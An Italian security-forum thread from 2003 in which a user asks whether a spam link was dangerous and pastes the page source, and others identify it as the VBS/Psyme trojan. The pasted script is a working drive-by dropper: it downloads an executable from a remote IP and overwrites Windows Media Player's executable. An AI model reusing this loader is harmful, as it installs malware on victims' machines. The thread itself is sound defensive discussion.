Condividi:        

Sito pericoloso?

Come rimuovere virus e spyware? Le carte di credito sono davvero sicure in rete? È possibile navigare anonimi? Con quali programmi tutelare la propria privacy? Come proteggere i file importanti? Se volete una risposta a queste e altre domande questo è il luogo giusto!

Moderatori: m.paolo, kadosh, Luke57

Sito pericoloso?

Postdi horst » 04/12/03 21:53

Scrivo comunicare un fatto che a me è parso tendenzialmente pericoloso (anche se potrei sbagliarmi, dato che non sono un esperto)
Ho ricevuto oggi una mail (chiaramente uno spam) con il titolo: New Terract in USA!, che diceva di battere un pulsante che avrebbe portato all' indirizzo http:// 69.72.129.89 (ATTENZIONE... navigare su questo indirizzo viene fatto a proprio rischio e pericolo in quanto è presente un "virus". Il link è pubblicato al solo scopo di studio. Topic edited by Piercing) per ulteriori informazioni.
Ingenuamente ho battuto il tasto (tanto, che vuoi che capiti oltre a qualche sito porno!) e non ho trovato che una finestra bianca.
Per curiosità ho controllato il codice che comincia cosi:
Codice: Seleziona tutto
<textarea id="code" style="display:none;">

   var x = new ActiveXObject("Microsoft.XMLHTTP");
   x.Open("GET", "http://69.72.129.89/mstasks.exe",0);
   x.Send();

   var s = new ActiveXObject("ADODB.Stream");
   s.Mode = 3;
   s.Type = 1;
   s.Open();
   s.Write(x.responseBody);

   s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
   location.href = "mms://";

</textarea>
<snip>

Come detto non sono un esperto ma mi sembra di capire che se avessi avuto l'ActiveX (e forse se non avessi usato come browser il Netscape) mi sarei trovato con qualche programma indesiderato sul mio HD.
Mi potete dire se questa bestia è pericolosa?
Ciao
Horst
horst
Newbie
 
Post: 5
Iscritto il: 26/08/01 01:00

Sponsor
 

Postdi verbal666 » 04/12/03 22:27

sembrerebbe proprio un attacco.......
l'indirizzo andando a vedere è così registrato

OrgName: Pegasus Web Technologies
OrgID: PWT-5
Address: 1719 Route10E, Suite 220
City: Parsippany
StateProv: NJ
PostalCode: 07417
Country: US

NetRange: 69.72.128.0 - 69.72.191.255
CIDR: 69.72.128.0/18
NetName: PEGASUSHOST
NetHandle: NET-69-72-128-0-1
Parent: NET-69-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.PWEBTECH.COM
NameServer: NS2.PWEBTECH.COM
Comment:
RegDate: 2003-09-03
Updated: 2003-09-03

TechHandle: JS3618-ARIN
TechName: Silverglate, Jason
TechPhone: +1-973-267-4707
TechEmail: jason@pwebtech.com

OrgTechHandle: JS3618-ARIN
OrgTechName: Silverglate, Jason
OrgTechPhone: +1-973-267-4707
OrgTechEmail: jason@pwebtech.com
!sto con Windows, ma amo Linux! ;)
Immagine
http://www.verbal.it
verbal666
Utente Senior
 
Post: 693
Iscritto il: 27/12/02 12:13

Postdi piercing » 07/12/03 14:57

il risultato della navigazione sarebbe stato quello di downloadare un cavallo di troia denominato VBS/psyme...

Qualche riferimento lo trovi qui...

http://vil.nai.com/vil/content/v_100749.htm
Avatar utente
piercing
Moderatore
 
Post: 7569
Iscritto il: 10/04/02 10:34
Località: Roma

Postdi horst » 07/12/03 23:42

Devo quindi render grazie a S.Netscape?
Però Javascript era attivato!
O non è compatibile con VBScript?
Horst
horst
Newbie
 
Post: 5
Iscritto il: 26/08/01 01:00


Torna a Sicurezza e Privacy


Topic correlati a "Sito pericoloso?":


Chi c’è in linea

Visitano il forum: Nessuno e 72 ospiti